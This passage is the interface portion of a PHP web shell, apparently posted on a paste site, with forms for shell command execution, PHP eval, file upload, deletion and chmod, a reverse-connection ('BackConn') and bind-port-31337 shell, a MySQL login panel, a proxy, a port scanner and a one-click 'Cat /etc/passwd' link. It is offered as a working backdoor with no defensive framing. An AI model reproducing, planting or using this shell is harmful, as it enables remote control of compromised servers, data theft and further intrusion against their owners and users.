- <div align="center"><strong>:: Make File ::</strong><br />
- <input type=hidden name=mode value=mkfile>
- name
- <input type=text name='mkfile' size="12">
- <input name="submit" type=submit value=make>
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"> <form action=# name='delfile' method=post>
- <div align="center"><strong>:: Delete File :: </strong><br>
- <input type=hidden name=mode value=delfile>
- name
- <input type=text name='delfile' size="12">
- <input type=submit value=unlink>
- </div>
- </form> </td>
- </tr>
- <tr>
- <td style="border:#FFFFFF 1px solid;"><form method="post" action="#" enctype="multipart/form-data">
- <div align="center"><strong>:: upload :: </strong><br>
- <input type="hidden" name="mode" value="upload2" />
- <input name="myfile" type="file" id="myfile" value="Load..." size="20" />
- <input type="submit" name="ok" value="do" />
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form action=# method=post>
- <div align="center"><strong>:: Rename File :: </strong><br>
- <input type="hidden" name="mode" value="renfile" />
- <input type="text" name="oldname" value="0ld name" size="15" />
- <input type="text" name="newname" value="New name" size="15" />
- <input name="submit" type="submit" value="Ren" />
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
- <div align="center"><strong>:: Make Dir :: </strong><br>
- <input type="hidden" name="mode" value="mkdir" />
- name
- <input name="mkdir" type="text" size="18" />
- <input name="submit" type="submit" value="ok" />
- </div>
- </form> </td>
- </tr>
- <tr>
- <td style="border:#FFFFFF 1px solid;"><form action=# method=post>
- <div align="center"><strong>:: Cmd Execution :: </strong><br>
- <input type=hidden name=mode value=cmd>
- <input name=cmd size="26" tpye=text>
- <input name="submit" type=submit value=exec>
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
- <div align="center"><strong>:: BackConn :: </strong><br>
- <input type=hidden name=mode value=reverse />
- <input name="ip" type="text" value="<?=$_SERVER['REMOTE_ADDR']?>" size="26" />
- <input name="port" type="text" value="port..." size="10" />
- <input name="submit" type="submit" value="BackConn" />
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form action=# method="post">
- <div align="center"><strong>:: Bind Port :: </strong><br>
- <input type="hidden" name="mode" value="bind" />
- <input name="submit7" type=submit value="Bind port 31337" />
- </div>
- </form> </td>
- </tr>
- <tr>
- <td style="border:#FFFFFF 1px solid;"><form action="#" method="post" name="sqlpanel" id="sqlpanel">
- <div align="center"><strong>:: MySQL Panel :: </strong><br>
- <input type=hidden name=mode value=loginsql />
- <input name="user" type="text" value="<?=(isset($_COOKIE[mysql_user]))?$_COOKIE[mysql_user]:"user"?>" size="9" />
- <input type="text" size="10" name="pass" value="<?=(isset($_COOKIE[mysql_pass]))?$_COOKIE[mysql_pass]:"pass"?>" />
- <input type="text" name="host" size="10" value="<?=(isset($_COOKIE[mysql_host]))?$_COOKIE[mysql_host]:"host"?>" />
- <input name="dbname" type="text" value="<?=(isset($_COOKIE[mysql_name]))?$_COOKIE[mysql_name]:"database"?>" size="10" />
- <input name="submit" type="submit" value="MySQL" />
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
- <div align="center"><strong>:: PHP Execution :: </strong><br>
- <input type="hidden" value="eval" name="mode" />
- <input name="eval" type="text" size="30" />
- <input type="submit" value="Eval" />
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form action=# method=post name="folder" id="folder">
- <div align="center"><strong>:: Go Dir ::</strong> <br>
- <input type=hidden name='mode' value='ls'>
- <input type=text value='<?=$dir?>' name='dir'>
- <input type=submit value=change/list>
- </div>
- </form></td>
- </tr>
- <tr>
- <td style="border:#FFFFFF 1px solid;"><div align="center">
- <form method="post" action="#">
- <strong>:: Proxy ::</strong> <br>
- <input name="mode" type="hidden" id="mode" value="proxysurf" />
- url: <input name="url" type="text" size="30" />
- <input type="submit" value="surf" />
- <input name="curl" type="checkbox" id="curl" value="curl" /> curl
- <input name="fopen" type="checkbox" id="fopen" value="fopen" /> fopen<br />
- </form></div>
- </td>
- <td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
- <div align="center"><strong>:: File Change Mode:: </strong><br>
- <input type="hidden" value="chmod" name="mode" />
- <input name="filename" type="text" id="filename" value="file" size="15" />
- <input name="filemode" type="text" id="filemode" value="mode" size="15" />
- <input type="submit" value="Chmod" />
- </div>
- </form> </td>
- <td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
- <div align="center"><strong>:: Port Scan :: </strong><br>
- <input type="hidden" value="scan" name="mode" />
- <input name="host" type="text" id="host" value="host" size="15" />
- <input name="minport" type="text" value="max port" size="10" />
- <input name="maxport" type="text" id="maxport" value="max port" size="10" />
- <input type="submit" value="scan" />
- </div>
- </form> </td>
- </tr>
- </table>
- <form action=# name=tools method=post>
- <span class="Stile1">
- <input type=hidden name=mode value=tools />
- <input type=hidden name=nometool />
- </span>
- </form>
- <span class="Stile1">
- <div align="center"><a class="link" href="javascript:document.folder.dir.value='<?=addslashes(realpath("."))?>';document.folder.submit();">Home</a> - <a class="link" href="javascript:document.tools.nometool.value='passwd';document.tools.submit();">Cat /etc/passwd</a> - <a class="link" href="javascript:document.tools.nometool.value='encoder';document.tools.submit();">Encoder</a> - <a class="link" href="javascript:document.tools.mode.value='phpinfo';document.tools.submit();">PHPInfo</a> - <a class="link" href="javascript:document.tools.nometool.value='scanner';document.tools.submit();">ShellScan</a> - <a class="link" href="javascript:document.tools.nometool.value='proxy';document.tools.submit();">Proxy</a> </div>
- <br>
- Directory:</span>
- <? $pd = $e = explode(DIRECTORY_SEPARATOR,substr($dir,0,-1));
- $i = 0;
- foreach($pd as $b)
- {
- $t = "";
- $j = 0;
- foreach ($e as $r)
- {
- $t.= $r.DIRECTORY_SEPARATOR;
- if ($j == $i) {break;}
- $j++;
- }
- echo "<a class=\"link\" href=\"javascript:document.folder.dir.value='".urlencode(addslashes($t))."';document.folder.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
- $i++;
- }
- ?><br>
- <br>
- <?=$error?><?=$output?> </td>
- </tr>
- </table>
- </body>
- </html>
- <? die(); ?>
Add Comment
Please, Sign In to add comment